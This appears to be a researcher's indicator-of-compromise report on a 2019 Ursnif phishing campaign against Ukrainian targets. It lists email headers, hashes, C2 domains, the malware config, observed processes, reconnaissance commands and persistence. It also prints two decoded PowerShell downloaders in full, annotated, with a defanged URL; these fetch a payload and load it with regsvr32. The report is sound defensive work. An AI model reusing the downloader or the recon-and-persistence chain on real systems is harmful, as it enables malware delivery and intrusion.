- #IOC #OptiData #VR #emotet_doc #ursnif_payload #W97M #PowerShell #ENC #inject
- https://pastebin.com/1XfkVE5e
- previous_contact: n/a
- FAQ: https://radetskiy.wordpress.com/2018/04/03/ioc_ursnif_020418/
- attack_vector
- --------------
- email attach .DOC > macro > b64 > powershell > GET bin > %user%\*.bin > %user%\appdata\roaming\microsoft\audizfwk\adsnwave.dll
- email_headers
- --------------
- #1
- Return-Path: <noreply@princefinance.princefamily33.com>
- Received: from gateway36.websitewelcome.com (gateway36.websitewelcome.com [192.185.201.2])
- Received: from cm14.websitewelcome.com (cm14.websitewelcome.com [100.42.49.7])
- Received: from box5254.bluehost.com ([162.241.225.96])
- Received: from [89.253.149.192] (port=53724 helo=5.61.57.146)
- Subject: терміново
- From: "Tetyana.Olekseevna@monolit.dn.ua" <noreply@princefinance.princefamily33.com>
- Date: Thu, 17 Oct 2019 16:35:57 +0300
- X-Source-IP: 89.253.149.192
- X-Source-Sender: (5.61.57.146) [89.253.149.192]:53724
- X-Source-Auth: noreply@princefinance.princefamily33.com
- #2
- Return-Path: <christina@princeonlinewebdesign.com>
- Received: from gateway22.websitewelcome.com (gateway22.websitewelcome.com [192.185.46.142])
- Received: from cm16.websitewelcome.com (cm16.websitewelcome.com [100.42.49.19])
- Received: from box5254.bluehost.com ([162.241.225.96])
- Received: from [178.75.241.39] (port=9647 helo=5.61.57.146)
- Date: Thu, 17 Oct 2019 16:35:57 +0300
- From: "Zoryana.Volodimirovna@topyachts.com.ua" <christina@princeonlinewebdesign.com>
- Subject: Рахунок-Фактура №340
- X-Source-IP: 178.75.241.39
- X-Source-Sender: (5.61.57.146) [178.75.241.39]:9647
- X-Source-Auth: christina@princeonlinewebdesign.com
- #3
- Return-Path: <betty@upstatehealthcareservices.com>
- Received: from gproxy6-pub.mail.unifiedlayer.com (outbound-ss-348.hostmonster.com [74.220.202.212])
- Received: from cmgw15.unifiedlayer.com (unknown [10.9.0.15])
- Received: from box787.bluehost.com ([66.147.244.87])
- Received: from [62.176.68.133] (port=61085 helo=5.61.57.146)
- From: "Ivan.Volodimirovich@scalehobby.com.ua" <betty@upstatehealthcareservices.com>
- Date: Thu, 17 Oct 2019 16:22:40 +0300
- Subject: Рахунок за Газ №9282
- X-Source-IP: 62.176.68.133
- X-Source-Sender: (5.61.57.146) [62.176.68.133]:61085
- X-Source-Auth: betty@upstatehealthcareservices.com
- files
- --------------
- SHA-256 f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287
- File name rahunok#0027980.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
- File size 285 KB (291840 bytes)
- SHA-256 3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087
- File name rahunok#0037239.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
- File size 329.5 KB (337408 bytes)
- SHA-256 e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b
- File name hfsjaoipqewfbwoei.bin (point.dll) [PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit]
- File size 1.1 MB (1150976 bytes)
- activity
- **************
- PL_SCR 161.117.39.210 limitsno{.} at/hfsjaoipqewfbwoei.bin
- C2 47.74.186.51 vip-statistic{.} at
- + @bomccss
- #ursnif config
- serpent_key: Dfei8OoQ0xhjTyql
- botnet-id: 700
- version: 217027
- c2:
- cxzko43pnr7ujnte[.]onion
- vip-statistic[.]at
- intrade-support[.]at
- fresh-girls[.]at
- netwrk
- --------------
- [ssl]
- 216.58.201.78 google.com Client Hello
- [http]
- 47.74.186.51 limitsno{.} at GET /hfsjaoipqewfbwoei.bin HTTP/1.1 noUA
- 47.74.186.51 vip-statistic{.} at GET /images/NFVfNmnFntzllAW_2/..../P1.gif HTTP/1.1 Mozilla/4.0
- 47.74.186.51 vip-statistic{.} at POST /images/ZP9eBpRUFTo1VIxz/.../C.bmp HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershell.exe 2832 TCP localhost 49168 47.74.186.51 80 ESTABLISHED
- explorer.exe 1988 TCP localhost 49169 216.58.201.78 443 ESTABLISHED
- explorer.exe 1988 TCP localhost 49170 216.58.201.68 443 ESTABLISHED
- explorer.exe 1988 TCP localhost 49171 47.74.186.51 80 ESTABLISHED
- explorer.exe 1988 TCP localhost 49172 5.61.57.146 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enco (base64)
- "C:\Windows\system32\regsvr32.exe" /s C:\Users\operator\nKUXcZ.bin
- C:\Windows\system32\control.exe /?
- "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL /?
- C:\Windows\system32\cmd.exe
- cmd.exe /C "nslookup myip.opendns.com resolver1.opendns.com > C:\tmp\415B.bi1"
- cmd /C "echo -------- >> C:\tmp\415B.bi1"
- "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
- cmd /C "systeminfo.exe > C:\tmp\A13.bin1"
- C:\Windows\system32\systeminfo.exe
- cmd /C "net view >> C:\tmp\A13.bin1"
- C:\Windows\system32\net.exe net view
- cmd /C "nslookup 127.0.0.1 >> C:\tmp\A13.bin1"
- cmd /C "tasklist.exe /SVC >> C:\tmp\A13.bin1"
- cmd /C "driverquery.exe >> C:\tmp\A13.bin1"
- cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\tmp\A13.bin1"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2019 14:07
- crypssec Free Age SportsSignup Meat
- c:\users\operator\appdata\roaming\microsoft\audizfwk\adsnwave.dll 06.10.2019 13:51
- @rundll32 "C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll",DllRegisterServer
- drop
- --------------
- C:\Users\operator\nKUXcZ.bin
- C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll
- C:\tmp\A13.bin1 - zip _ extracted info !!!
- C:\tmp\415B.bi1 - zip _ extracted info !!!
- C:\tmp\D5D9.bin - zip _ extracted info !!!
- C:\tmp\422B.bin - zip _ extracted info !!!
- C:\tmp\2BF9.bin - zip _ extracted info !!!
- C:\tmp\4DC3.bin - zip _ extracted info !!!
- C:\tmp\3083.bin - zip _ extracted info !!!
- decoded b642powershell
- --------------
- #1
- # Decoded stage-1 PowerShell downloader, variant #1, reproduced as observed (URL defanged).
- # Every assignment of a random-looking string that is never read again is padding; only
- # $kjqpsfw, $bduhtq, $rwwci and $mtfyqp are referenced by the dwnld routine that follows.
- $yozninjdjc="wxvhw";
- # Base name of the dropped file; matches the "proc"/"drop" sections (C:\Users\operator\nKUXcZ.bin).
- $kjqpsfw = "nKUXcZ";
- $kyvisokdvpou="iisvbivwcdfv";
- # Drop path is %USERPROFILE%\<name>.bin — written to the profile root, not a temp directory.
- $bduhtq=$env:userprofile+"\"+$kjqpsfw+".bin";
- $shofvhgo="hfaho";
- # New-Object is called through a quoted string, &("new-object"), presumably to defeat simple
- # keyword matching; the resulting object is a System.Net.WebClient.
- $rwwci=&("new-object") net.webclient;
- $mznbayyscbf="clmvzpwymfxtqyuuq";
- # Payload URL, plain HTTP; the "netwrk" section records this GET with no User-Agent (noUA).
- $mtfyqp="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
- $hxpdmkdtmrg="kclcrunb";
- # Download-and-load routine (variant #1). Flow: DownloadFile -> size check -> regsvr32 /s <file>.
- # Both the "file too small" branch and the catch block recurse into dwnld with no retry cap and
- # no delay, so an unreachable host keeps the process looping and re-issuing the same GET.
- Function dwnld{
- $ndrrgwesufj="bqdtsgtsy";
- try{
- $ubjlvybhksmvmqz="svebvywesqwpbtt";
- # Fetch the payload to %USERPROFILE%\nKUXcZ.bin; the method name is a quoted string, another string-based call.
- $rwwci."DownloadFile"($mtfyqp, $bduhtq);
- $nosvyxzfejquwqm="jaqaiyxlv";
- # Proceed only if at least 200000 bytes arrived — presumably to reject truncated downloads or
- # error pages; the real payload listed in the "files" section is ~1.1 MB.
- If ((.("Get-Item") $bduhtq)."length" -ge 200000) {
- $pnpeirog="kmcyuo";
- # Loads the dropped PE via regsvr32 /s (silent) and waits for it; matches the "proc" line
- # regsvr32.exe /s C:\Users\operator\nKUXcZ.bin. Detection point: powershell.exe spawning
- # regsvr32.exe with a non-.dll path under the user profile.
- $ugvjgt = Start-Process -FilePath "regsvr32.exe" -Args "/s $bduhtq" -Wait -NoNewWindow -PassThru;
- $ksecir="jvnvnwurbfdxqygqf";
- } else {
- $mhmwvmqfuybxwur="drffczm";
- # Short or empty download: retry by recursion (unbounded).
- dwnld;
- $pemmvoigqmsza="jyeqziuppapb";
- }
- $cqhccbph="gvuz";
- }catch{
- $rcvwrhfjqqxxch="mqeezcoacfemgpkzkd";
- # Any exception (e.g. name resolution or HTTP failure) also recurses — unbounded.
- dwnld;
- $vwdggtfwd="ovjvyghtjfxrnktgt";
- # The function body closes here and dwnld is invoked immediately on the same line.
- }}dwnld;
- $zbadv="vccbbnzdpdyqgcv";
- #2
- # Decoded stage-1 PowerShell downloader, variant #2 (from the second .doc). Same logic as
- # variant #1 with fresh random identifiers and a different drop name; padding assignments are
- # never read, and only $mgvtio, $yueeoa, $ngvqvqb and $nslldzj feed the dwnld routine below.
- $zhsiziqtdjjsyfye="nxoyyqtocw";
- # Drop name for this variant (UJqEF.bin). Note the "proc"/"drop" sections above record the
- # variant #1 name (nKUXcZ.bin), not this one.
- $mgvtio = "UJqEF";
- $ithgawkqu="wgpqgqgnhjruhliad";
- # Drop path is %USERPROFILE%\<name>.bin.
- $yueeoa=$env:userprofile+"\"+$mgvtio+".bin";
- $izbblp="zlzhdcptbhaunoglez";
- # New-Object invoked through a quoted string; the object is a System.Net.WebClient.
- $ngvqvqb=&("new-object") net.webclient;
- $kltkpujnqzfofb="dzygqluhywhhvtx";
- # Same payload URL as variant #1 (defanged).
- $nslldzj="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
- $rbntzlbqkulv="vvrfbdvtoo";
- # Download-and-load routine (variant #2); identical in structure to variant #1:
- # DownloadFile -> size check (>= 200000 bytes) -> regsvr32 /s <file>, with unbounded
- # recursive retries on a short file or on any exception.
- Function dwnld{
- $lazaxcmudbef="wzgiffoctszol";
- try{
- $wrqkxxidhtjrrcq="bviazvtzbmwpoiz";
- # Fetch the payload to %USERPROFILE%\UJqEF.bin via a quoted ("DownloadFile") method call.
- $ngvqvqb."DownloadFile"($nslldzj, $yueeoa);
- $wurllwckcoaobk="cwnwbf";
- # Size gate, presumably to reject truncated downloads or error pages.
- If ((.("Get-Item") $yueeoa)."length" -ge 200000) {
- $quyqejvsjujj="mzoffmbtc";
- # Silent regsvr32 load of the dropped PE; detection point is powershell.exe -> regsvr32.exe
- # with a .bin path under the user profile.
- $jdjpil = Start-Process -FilePath "regsvr32.exe" -Args "/s $yueeoa" -Wait -NoNewWindow -PassThru;
- $gzvivurflv="koherilwrbkvczpi";
- } else {
- $ypcmgzp="zkupghelnqeegzm";
- # Short or empty download: retry by recursion (no cap, no delay).
- dwnld;
- $zgxifpixbe="bwoffieyelusq";
- }
- $jbialh="huodfndgmg";
- }catch{
- $yjkwithuhhapy="ilcdki";
- # Any exception also recurses — unbounded.
- dwnld;
- $xlgnju="gpstdwckvbm";
- # Function body closes here and dwnld is invoked on the same line.
- }}dwnld;
- $gxpfk="ehxqxmwggmw";
- # # #
- https://www.virustotal.com/gui/file/f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287/details
- https://www.virustotal.com/gui/file/3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087/details
- https://www.virustotal.com/gui/file/e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b/details
- https://analyze.intezer.com/#/analyses/4db134a6-ebba-4515-bb5e-1b6ef9ac81f1
- VR
- @